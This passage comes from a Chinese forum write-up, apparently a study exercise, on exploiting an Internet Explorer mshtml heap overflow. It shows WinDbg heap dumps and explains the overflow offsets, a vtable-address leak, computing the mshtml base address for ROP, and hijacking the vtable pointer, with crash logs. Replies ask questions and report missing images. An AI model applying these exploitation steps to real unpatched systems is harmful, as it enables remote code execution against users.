03f2b490  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b4a0  41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2  A.A.A...........
03f2b4b0  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b4c0  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b4d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b4f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b500  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b510  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b520  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b530  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b540  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b550  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b560  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b570  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b580  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b590  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b5b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b5c0  91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b5d0  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b5e0  e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  .....<.h........
03f2b5f0  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b600  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b620  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b650  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b660  00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03  ................
03f2b670  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b680  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b690  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6a0  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b6b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6c0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b6d0  00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2  ................
03f2b6e0  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b6f0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b700  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b710  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b720  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b730  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b740  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b750  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b760  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b770  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b780  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b790  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b7a0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b7b0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b7c0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b7d0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b7e0  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b7f0  d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2b800  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b810  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b820  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b830  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b840  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b850  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b860  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b870  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b880  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b890  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8a0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b8f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b900  41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2  A.A.A...........
03f2b910  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b920  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b930  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b940  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b950  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b960  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b970  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b980  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b990  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b9f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2ba10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2ba20  6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  m........j......
03f2ba30  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2ba40  50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  P....<.h........
03f2ba50  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2ba60  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2ba70  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2ba80  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2ba90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bab0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bac0  00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03  ................
03f2bad0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bae0  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2baf0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb00  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2bb10  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb20  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2bb30  00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2  ........N.......
03f2bb40  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2bb50  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bb60  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bb70  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bb80  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bb90  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bba0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bbb0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bbc0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bbd0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2bbe0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2bbf0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2bc00  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2bc10  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2bc20  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2bc30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2bc40  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2bc50  a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  .........a......
03f2bc60  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2bc70  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc80  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bc90  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bca0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcb0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcc0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcd0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bce0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bcf0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd00  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd10  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd20  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd30  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd40  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd50  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2bd60  41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2  A.A.A...........
03f2bd70  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2bd80  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2bd90  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bda0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdb0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdc0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdd0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bde0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2bdf0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be00  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be10  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be20  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be30  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2be40  42 00 42 00 42 00 42 00-42 00 42 00              B.B.B.B.B.B.

很简单的能观察到03f2ae30的AAAA字符串被大量覆盖,所以它就是vulheap。
为做对比,我多打印了很多,下面的未被覆盖的AAAA都是成片出现的。

 

不过对比漏洞战争书上,本来03f2b040地址处的fa被覆盖为48 00 01 00即0x00010048,这个覆盖看的出来(下图蓝色框线).
按照0x03f2ae30+0x100(EEEE...)+0x8(堆指针大小)+0x100(AAAA...)+0x8(堆指针大小)=03f2b040,也确实应该是这里,我应该没理解错。

 

但是很奇怪,我的fa也还在……(下图红色框线),这可能就是我之前弹窗打印出的虚表地址不正确的原因吧,感觉别人的文章里都不会这样……难以理解

 

得到虚表地址后,计算mshtml基地址,构造rop。

 

然后再次溢出,这次溢出直接像刚刚覆盖BBBB的大小一样,直接覆盖虚表指针,于是就可以劫持虚表指针到任意地址,如下。

(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024--->控制虚表指针 ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
003d006b 777a            ja      003d00e7                                [br=1]

总结

调试poc的时候还是比较顺利的,在调exp那里各种卡壳,唉。
主要还是学到了一些windbg的使用吧。
比如如果要下断点,其实可以在html里插入数学函数,比如用Math.cos,然后在jscript!Cos下断。
比如要查看jscript的导出表,可以在windbg里用x jscript!* 来查找,找虚表可以使用类似的方法(见上文)


[培训]《安卓高级研修班(网课)》月薪三万计划

收藏
点赞1
打赏
分享
最新回复 (6)
雪    币: 62
活跃值: (27)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
toToC 2018-7-28 18:05
2
0
我跟着楼主的分析过程分析了该漏洞,覆盖了虚函数,完成堆喷,但是调用虚函数的时候,发现取不到值了,楼主能解释下原因吗?
0:013> g
(e18.a98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024 ebx=01000000 ecx=02e84bd8 edx=00000041 esi=0208d430 edi=006df6b8
eip=6801e664 esp=0208d26c ebp=0208d2a0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!NotifyElement+0x3e:
6801e664 ff5008          call    dword ptr [eax+8]    ds:0023:0707002c=????????

雪    币: 1329
活跃值: (42)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
ysun 2018-7-29 20:12
3
0
前排支持大佬
雪    币: 8624
活跃值: (374)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
aalonglz 2019-1-3 16:28
4
0
好东西,学习学习。
雪    币: 3825
活跃值: (5433)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
badboyl 2 2019-1-4 15:44
5
0
大佬,图挂了。
雪    币: 2179
活跃值: (177)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
apaoa 2019-1-14 23:10
6
0
大佬,图挂了。麻烦补一下
雪    币: 26435
活跃值: (18467)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
kanxue 8 2019-2-1 13:40
7
0
sakura零,您好,图片丢失了。建议图片,都直接论坛本地化保存。放外链,时间长了就会丢失。
查看了一下你的帖,大部分的帖,我们人工转到本地保存了,但还是有少部分没有图片没法转。
游客
登录 | 注册 方可回帖
返回